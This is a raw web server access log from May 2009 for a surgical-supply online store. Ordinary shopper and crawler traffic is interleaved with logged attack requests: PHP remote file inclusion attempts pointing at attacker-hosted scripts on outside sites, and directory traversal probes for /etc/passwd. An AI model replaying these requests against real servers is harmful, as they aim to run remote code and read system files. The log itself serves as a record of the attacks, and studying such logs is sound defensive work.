217.112.35.52 - - [08/May/2009:00:51:04 -0400] "GET /logs/?DOCUMENT_ROOT=http://gotfink.com//cache/ts??? HTTP/1.1" 200 480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
217.112.35.52 - - [08/May/2009:00:51:05 -0400] "GET /?DOCUMENT_ROOT=http://gotfink.com//cache/ts??? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.249.72.114 - - [08/May/2009:00:52:23 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006EB84246109700F0DB08U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.20.225.45 - - [08/May/2009:00:52:50 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:52:50 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:00:52:50 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
74.6.8.112 - - [08/May/2009:00:53:04 -0400] "GET /logs/error_log.Q108062100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.125.245.26 - - [08/May/2009:00:53:17 -0400] "GET /logs/%3Cbug%3E/../../../../../../../../etc/passwd HTTP/1.1" 400 189 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
75.125.245.26 - - [08/May/2009:00:53:17 -0400] "GET /%3Cbug%3E/../../../../../../../../etc/passwd HTTP/1.1" 400 189 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
122.116.178.20 - - [08/May/2009:00:53:21 -0400] "GET /logs/access_log.Q108060100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:00:53:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [08/May/2009:00:53:30 -0400] "GET /logs/access_log.Q108060100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.253.45 - - [08/May/2009:00:54:13 -0400] "GET /logs///include/lib.inc.php?site_path=../../../../../../../../etc/passwd HTTP/1.0" 404 224 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:00:54:13 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.rabika.ru/hk? HTTP/1.0" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
122.116.178.20 - - [08/May/2009:00:54:22 -0400] "GET /logs/access_log.Q108061400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:54:24 -0400] "GET /logs/access_log.Q108061400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:54:43 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.94.30.156 - - [08/May/2009:00:55:12 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:00:55:12 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:00:55:12 -0400] "GET /logs/access_log.Q108122200//components/com_simpleboard/image_upload.php?sbp=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:00:55:12 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.111.176.64 - - [08/May/2009:00:55:19 -0400] "GET /logs/access_log.Q108102400/index.php?p=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.111.176.64 - - [08/May/2009:00:55:20 -0400] "GET /index.php?p=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
89.111.176.64 - - [08/May/2009:00:55:20 -0400] "GET /logs/index.php?p=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
66.197.202.64 - - [08/May/2009:00:55:53 -0400] "GET /logs/access_log.Q108060100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:00:56:23 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.94.30.156 - - [08/May/2009:00:56:26 -0400] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:00:56:26 -0400] "GET /logs/access_log.Q108091300%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:00:56:26 -0400] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:00:56:47 -0400] "GET /logs/access_log.Q109032900%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
75.125.245.26 - - [08/May/2009:00:56:49 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
75.125.245.26 - - [08/May/2009:00:56:49 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.38.54.141 - - [08/May/2009:00:57:22 -0400] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 256 "-" "Microsoft Pocket Internet Explorer/0.6"
218.38.54.141 - - [08/May/2009:00:57:23 -0400] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 261 "-" "Microsoft Pocket Internet Explorer/0.6"
159.71.254.248 - - [08/May/2009:00:57:35 -0400] "GET /images/psearch_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:35 -0400] "GET /images/login_go.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.93.9.125 - - [08/May/2009:00:57:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:00:57:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
69.94.30.156 - - [08/May/2009:00:57:36 -0400] "GET /logs/access_log.Q108122200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
159.71.254.248 - - [08/May/2009:00:57:36 -0400] "GET /images/login_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:36 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
76.93.9.125 - - [08/May/2009:00:57:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:00:57:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
69.94.30.156 - - [08/May/2009:00:57:41 -0400] "GET /logs/access_log.Q108083000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
159.71.254.248 - - [08/May/2009:00:57:49 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE%20BUR%203.75%20I.D. HTTP/1.0" 200 38031 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:51 -0400] "GET /images/head_aceLogo.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:51 -0400] "GET /images/head_btn-shop.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:51 -0400] "GET /images/head_btn-products.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:51 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-brochures.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_surgical-supply.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-conventions.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:52 -0400] "GET /images/blend.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-products-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:57:53 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:00 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG HTTP/1.0" 200 61576 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):TREPHINE BUR 3.75 I.D." "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/pf-a.gif HTTP/1.0" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/items/04948401_THUMB.JPG HTTP/1.0" 200 2092 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/items/04948702_THUMB.JPG HTTP/1.0" 200 2621 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/items/04948501_THUMB.JPG HTTP/1.0" 200 2235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/items/04948502_THUMB.JPG HTTP/1.0" 200 2355 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/items/04948701_THUMB.JPG HTTP/1.0" 200 2523 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/space.gif HTTP/1.0" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:02 -0400] "GET /images/next.gif HTTP/1.0" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:03 -0400] "GET /images/items/04948002_THUMB.JPG HTTP/1.0" 200 1724 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1095AE4F76F0210021CC04K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
159.71.254.248 - - [08/May/2009:00:58:20 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1095AE4F7FE081002C0C04K+WSEQ(S0060):1+OUITEM(A0200):04948502 HTTP/1.0" 200 27013 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
